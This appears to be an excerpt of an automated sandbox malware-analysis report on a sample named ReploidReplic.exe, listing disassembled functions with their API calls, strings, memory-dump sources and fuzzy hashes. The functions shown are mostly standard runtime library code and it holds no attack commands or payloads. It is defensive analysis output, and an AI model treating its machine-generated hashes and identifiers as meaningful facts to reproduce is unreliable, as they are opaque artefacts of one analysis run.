Part of subcall function 6CE17557: _free.LIBCMT ref: 6CE17628
Part of subcall function 6CE17557: _free.LIBCMT ref: 6CE1763A
Part of subcall function 6CE17557: _free.LIBCMT ref: 6CE1764C

_free.LIBCMT ref: 6CE15661

Part of subcall function 6CE12F43: HeapFree.KERNEL32(00000000,00000000,?,6CE1217C), ref: 6CE12F59
Part of subcall function 6CE12F43: GetLastError.KERNEL32(?,?,6CE1217C), ref: 6CE12F6B

_free.LIBCMT ref: 6CE15683
_free.LIBCMT ref: 6CE15698
_free.LIBCMT ref: 6CE156A3
_free.LIBCMT ref: 6CE156C5
_free.LIBCMT ref: 6CE156D8
_free.LIBCMT ref: 6CE156E6
_free.LIBCMT ref: 6CE156F1
_free.LIBCMT ref: 6CE15729
_free.LIBCMT ref: 6CE15730
_free.LIBCMT ref: 6CE1574D
_free.LIBCMT ref: 6CE15765

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 3d252c44ca53919543e83aab1a2a6136666cec9dec4de580db7f475a8d16fd58
Instruction ID: e2061092d10124c17dbb0126197c67d52b17bae46ddcc89c96f895195c584a3a
Opcode Fuzzy Hash: 3d252c44ca53919543e83aab1a2a6136666cec9dec4de580db7f475a8d16fd58
Instruction Fuzzy Hash: 02311E71A0D301DEE7219B35DC46B8A73F9EF0521CF30456EE065D6E60DBB1EA648B50

Function 6CE12803 Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 6CE12819

Part of subcall function 6CE12F43: HeapFree.KERNEL32(00000000,00000000,?,6CE1217C), ref: 6CE12F59
Part of subcall function 6CE12F43: GetLastError.KERNEL32(?,?,6CE1217C), ref: 6CE12F6B

_free.LIBCMT ref: 6CE12825
_free.LIBCMT ref: 6CE12830
_free.LIBCMT ref: 6CE1283B
_free.LIBCMT ref: 6CE12846
_free.LIBCMT ref: 6CE12851
_free.LIBCMT ref: 6CE1285C
_free.LIBCMT ref: 6CE12867
_free.LIBCMT ref: 6CE12872
_free.LIBCMT ref: 6CE12880

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1db93cf7cae414e4525758e9e2e66219ff810a4a6340da05cd1003536f851a75
Instruction ID: b0c79b6f95d5991cb8a188221551a903c3813e70758bcc5c072fa0a2f35dc2d9
Opcode Fuzzy Hash: 1db93cf7cae414e4525758e9e2e66219ff810a4a6340da05cd1003536f851a75
Instruction Fuzzy Hash: 9921B876D08108AFCB51DF94CC85DDD7BB8EF19244F2041AAB515ABA21DBB1DB58CB80

Function 6CE1446A Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

api-ms-, xrefs: 6CE144C1
ext-ms-, xrefs: 6CE144D5
|!l, xrefs: 6CE1446C

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-$|!l
API String ID: 0-3485722451
Opcode ID: 98cd280bca1acb4df07f2fda07cdf4eefeaf98dcb4444b4817711e3d311c0898
Instruction ID: 039f2917c9a3234f71e89dcd65e119c9e7577798c0ac35181291cd1b54ac28e6
Opcode Fuzzy Hash: 98cd280bca1acb4df07f2fda07cdf4eefeaf98dcb4444b4817711e3d311c0898
Instruction Fuzzy Hash: D921E772A4D211ABDB128E6A8C41A5E37789F077ADF310626EC15A7F81DB30ED2585E0

Function 6CE10DE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_ValidateLocalCookies.LIBCMT ref: 6CE10E17
___except_validate_context_record.LIBVCRUNTIME ref: 6CE10E1F
_ValidateLocalCookies.LIBCMT ref: 6CE10EA8
__IsNonwritableInCurrentImage.LIBCMT ref: 6CE10ED3
_ValidateLocalCookies.LIBCMT ref: 6CE10F28

Strings

csm, xrefs: 6CE10EBD

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 220c8300dbcf9cbfd4ce64dbd52b4b050515dff95b2260e096de9253dedf89c1
Instruction ID: 0bb3dda64619191e067fd81157adfb0ff28f9d48b7b29e74238f09f3aa8c2fae
Opcode Fuzzy Hash: 220c8300dbcf9cbfd4ce64dbd52b4b050515dff95b2260e096de9253dedf89c1
Instruction Fuzzy Hash: 24417234A082489BCF00DF69C840A9EBBB5BF4532CF248159E8149BF51D735EA39CB91

Function 6CE137AF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\ReploidReplic.exe, xrefs: 6CE137B4
=9l, xrefs: 6CE13800

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID:
String ID: =9l$C:\Users\user\Desktop\ReploidReplic.exe
API String ID: 0-2713256572
Opcode ID: f622efee61996c44df705aaeb71bf5c835a4d0d39520308a3fbc84be1d49034d
Instruction ID: a52895218e9e317ffcd1791746d1dfeb8d3d682f599735c658a3505030ddc689
Opcode Fuzzy Hash: f622efee61996c44df705aaeb71bf5c835a4d0d39520308a3fbc84be1d49034d
Instruction Fuzzy Hash: DC21BE7160C209AFDB109F668C8599B77BEAF0236C7208629F52597F80E725DC618BA0

Function 6CE176F6 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6CE176BE: _free.LIBCMT ref: 6CE176E3

_free.LIBCMT ref: 6CE17744

Part of subcall function 6CE12F43: HeapFree.KERNEL32(00000000,00000000,?,6CE1217C), ref: 6CE12F59
Part of subcall function 6CE12F43: GetLastError.KERNEL32(?,?,6CE1217C), ref: 6CE12F6B

_free.LIBCMT ref: 6CE1774F
_free.LIBCMT ref: 6CE1775A
_free.LIBCMT ref: 6CE177AE
_free.LIBCMT ref: 6CE177B9
_free.LIBCMT ref: 6CE177C4
_free.LIBCMT ref: 6CE177CF

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
Instruction ID: b660124cc2a078d4e6001c4fb27cc70d9ea92bfc31646dafa0c89254809bc264
Opcode Fuzzy Hash: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
Instruction Fuzzy Hash: A2115771A48744A6D630ABB4CC06FC77BBCAF0AB04F70081DA29967E60DF75F6284761

Function 6CE1680F Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6CE16857
__fassign.LIBCMT ref: 6CE16A3C
__fassign.LIBCMT ref: 6CE16A59
WriteFile.KERNEL32(?,6CE14FF3,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CE16AA1
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CE16AE1
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CE16B89

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: ede11b3a96412a2e4763a373d4cfde641c933b3e6619da56bfe15775ce4ab58d
Instruction ID: 92202b9fc34ba9fe8fc2bb4dc483d898a7361140b0e51e2b423bc525fc426d91
Opcode Fuzzy Hash: ede11b3a96412a2e4763a373d4cfde641c933b3e6619da56bfe15775ce4ab58d
Instruction Fuzzy Hash: 2BC18E71D052588FCF11CFA9C8809EDBBB9EF09318F28816AD855F7B41D731AA56CB60

Function 6CE112B7 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6CE10F85,6CE100B0,6CE0FAC9,?,6CE0FD01,?,00000001,?,?,00000001,?,6CE1F120,0000000C,6CE0FDFA), ref: 6CE112C5
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CE112D3
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CE112EC
SetLastError.KERNEL32(00000000,6CE0FD01,?,00000001,?,?,00000001,?,6CE1F120,0000000C,6CE0FDFA,?,00000001,?), ref: 6CE1133E

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 3e9acddee74d7f824c4e9ebaa1fed77c4561fef263cc2b183d0d10a70e80cf0f
Instruction ID: 86814117c73331e282757b3d005d31cd9d5160de2e13a5785e43ea6b4b22d24f
Opcode Fuzzy Hash: 3e9acddee74d7f824c4e9ebaa1fed77c4561fef263cc2b183d0d10a70e80cf0f
Instruction Fuzzy Hash: B201D83261D6515EDA041DF65C989AB27F8DB2767C730032DF12081FD0EF62C879A1C4

Function 6CE11433 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,6CE114F4,00000000,?,00000001,00000000,?,6CE1156B,00000001,FlsFree,6CE1AD3C,FlsFree,00000000), ref: 6CE114C3

Strings

api-ms-, xrefs: 6CE11483

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: e086fef3256b1475399eb1cb8d050facbc1cb516fdeecdb550c8ddb7ab831362
Instruction ID: 91ecc762deb054dc248bf9061403392773877a5b6c351ee0570e17d47535d956
Opcode Fuzzy Hash: e086fef3256b1475399eb1cb8d050facbc1cb516fdeecdb550c8ddb7ab831362
Instruction Fuzzy Hash: C811A731F89671ABDF128E9A8C41B5933B8AF13B78F350210E912E7F80D760E92486D5

Function 6CE11AEA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CE11A9C,?,?,6CE11A64,?,00000001,?), ref: 6CE11AFF
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CE11B12
FreeLibrary.KERNEL32(00000000,?,?,6CE11A9C,?,?,6CE11A64,?,00000001,?), ref: 6CE11B35

Strings

mscoree.dll, xrefs: 6CE11AF8
CorExitProcess, xrefs: 6CE11B0A

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 4ded4039318ea912d92fa5ab58e38e8f222523a349cd7a3e2fa7c0c161969184
Instruction ID: 3ae7f34c32b1ef1e7e6c80a99ff476a04f094ec2229e1704eab504ca8752ed89
Opcode Fuzzy Hash: 4ded4039318ea912d92fa5ab58e38e8f222523a349cd7a3e2fa7c0c161969184
Instruction Fuzzy Hash: FCF01C35645118FFDF01AF90CD0AFAE7A79EB4576AF200064E401A2A60DB34CF28DB91

Function 0084B2D0 Relevance: 7.7, Strings: 6, Instructions: 249COMMON

Download Yara Rule

Strings

ujux, xrefs: 0084B495
6099, xrefs: 0084B344
W, xrefs: 0084B36F
uFZ\, xrefs: 0084B4AB
W~, xrefs: 0084B4B6
xwva, xrefs: 0084B3CF

Memory Dump Source

Source File: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1888167525.0000000000800000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888299409.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_ReploidReplic.jbxd

Similarity

API ID:
String ID: 6099$W$W~$uFZ\$ujux$xwva
API String ID: 0-1122162066
Opcode ID: 15c4e4cecf071b8b150356ab682e2cd82f1f04a1af7e387fedc85b01e833c0b9
Instruction ID: 4922c34d77d76b5324cd7cbaf8368534568368abad9e8e2abd3bcda200382dcd
Opcode Fuzzy Hash: 15c4e4cecf071b8b150356ab682e2cd82f1f04a1af7e387fedc85b01e833c0b9
Instruction Fuzzy Hash: 0F81CAB410D3C18BD3358F2994A17EBBBE1EF96344F28896CD4C98B392DB7984458B53

Function 6CE16107 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 6CE1618B
__alloca_probe_16.LIBCMT ref: 6CE16251
__freea.LIBCMT ref: 6CE162BD

Part of subcall function 6CE152BC: HeapAlloc.KERNEL32(00000000,6CE14FF3,6CE14FF3,?,6CE13CF3,00000220,?,6CE14FF3,?,?,?,?,6CE17111,00000001,?,?), ref: 6CE152EE

__freea.LIBCMT ref: 6CE162C6
__freea.LIBCMT ref: 6CE162E9

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: cb5ae936651f66330b2f9404ebe471ab43c46db693f9c7de207559d4f46bbdb7
Instruction ID: a9f2864c451503db0d575dcfc966c86aec3275bb51f6b25e597e070d510d981a
Opcode Fuzzy Hash: cb5ae936651f66330b2f9404ebe471ab43c46db693f9c7de207559d4f46bbdb7
Instruction Fuzzy Hash: CA517D72609616ABEB118E648C40EEB36BDEB4576CF354529F814EBF40E734D825C6A0

Function 6CE17655 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 6CE1766D

Part of subcall function 6CE12F43: HeapFree.KERNEL32(00000000,00000000,?,6CE1217C), ref: 6CE12F59
Part of subcall function 6CE12F43: GetLastError.KERNEL32(?,?,6CE1217C), ref: 6CE12F6B

_free.LIBCMT ref: 6CE1767F
_free.LIBCMT ref: 6CE17691
_free.LIBCMT ref: 6CE176A3
_free.LIBCMT ref: 6CE176B5

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e54c876e835ebec1d4355451635fe912b5b4c1b8043d219a2d7bc9b3e35a3ca7
Instruction ID: e03ac2333ef9115f0b43df26a1a67cd64235da68214068516553b9fede584cc6
Opcode Fuzzy Hash: e54c876e835ebec1d4355451635fe912b5b4c1b8043d219a2d7bc9b3e35a3ca7
Instruction Fuzzy Hash: D2F0F431A1D6445B8720DB69D886C6777F9EB0661C7700849F069D7F50D770F9904BE4

Function 6CE1707C Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 170fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6CE1680F: GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6CE16857

WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,6CE14FF3,?,00000000,00000000,6CE1F360,0000002C,6CE15064,?), ref: 6CE171C2
GetLastError.KERNEL32 ref: 6CE171CC
__dosmaperr.LIBCMT ref: 6CE1720B

Strings

dPl, xrefs: 6CE1707E

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite__dosmaperr
String ID: dPl
API String ID: 910155933-1338324705
Opcode ID: 7f53edfc60aad7fd3067ee4b8ba5f54dab779befb45263865c9141e856fe102a
Instruction ID: a355d2d1aa85668534830b9be07bafef731f568c8f321266b6f7050263efa493
Opcode Fuzzy Hash: 7f53edfc60aad7fd3067ee4b8ba5f54dab779befb45263865c9141e856fe102a
Instruction Fuzzy Hash: 9A51D4B2A48249ABDB018FA4C804FDE7B79EF4772CF340049E410A7F51D7759AA6C760

Function 6CE11B78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\ReploidReplic.exe, xrefs: 6CE11BBB, 6CE11BC2, 6CE11BF8
@", xrefs: 6CE11BC9

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID:
String ID: @"$C:\Users\user\Desktop\ReploidReplic.exe
API String ID: 0-3150779394
Opcode ID: 475c0e7483bd20db421576963b0fca3b38f16ac9fc8246dd2852ee65e04544fd
Instruction ID: 57a5a3f499b3d2bf661e1b22edb15b1cad7b4ab5a7f7326c6682ae043ba8c725
Opcode Fuzzy Hash: 475c0e7483bd20db421576963b0fca3b38f16ac9fc8246dd2852ee65e04544fd
Instruction Fuzzy Hash: 2E416471F08214AFDB15DBDAD88099FBBF8EB96358B30006AE404A7F50E771DA65CB50

Function 6CE13047 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6CE13669: _free.LIBCMT ref: 6CE13677

Part of subcall function 6CE1423D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,6CE162B3,?,00000000,00000000), ref: 6CE142E9

GetLastError.KERNEL32 ref: 6CE130AF
__dosmaperr.LIBCMT ref: 6CE130B6
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6CE130F5
__dosmaperr.LIBCMT ref: 6CE130FC

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: f5681213397d97c199b071df0d25b9c426e7072eef19dd5e3e5feb12b0b33629
Instruction ID: 2997fff29fa07bbc0618b087fa6dad3a7287d3d3383dc43eaedeced8cb4e8e20
Opcode Fuzzy Hash: f5681213397d97c199b071df0d25b9c426e7072eef19dd5e3e5feb12b0b33629
Instruction Fuzzy Hash: 0D21B2B170C605AF9B109F668C8089BB7BDAF0537C724861DE82993F50D731DC618B90

Function 6CE12947 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6CE16C57,?,00000001,6CE15064,?,6CE17111,00000001,?,?,?,6CE14FF3,?,00000000), ref: 6CE1294C
_free.LIBCMT ref: 6CE129A9
_free.LIBCMT ref: 6CE129DF
SetLastError.KERNEL32(00000000,00000013,000000FF,?,6CE17111,00000001,?,?,?,6CE14FF3,?,00000000,00000000,6CE1F360,0000002C,6CE15064), ref: 6CE129EA

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 88a57577bf326954587d6f73e1b63adbe4ac763113474f3d6245830ad029007d
Instruction ID: 2e933f3681a7ad20dc9050bd4e1d4a60b1b96f685ad68ea2c22f118905baef46
Opcode Fuzzy Hash: 88a57577bf326954587d6f73e1b63adbe4ac763113474f3d6245830ad029007d
Instruction Fuzzy Hash: 0E11C67370C1046BDA41667E9C89EAB27B9ABE33BCB34022DF52492FD1EB6588395110

Function 6CE12A9E Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00000001,6CE12ED8,6CE12F69,?,?,6CE1217C), ref: 6CE12AA3
_free.LIBCMT ref: 6CE12B00
_free.LIBCMT ref: 6CE12B36
SetLastError.KERNEL32(00000000,00000013,000000FF,?,00000001,6CE12ED8,6CE12F69,?,?,6CE1217C), ref: 6CE12B41

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
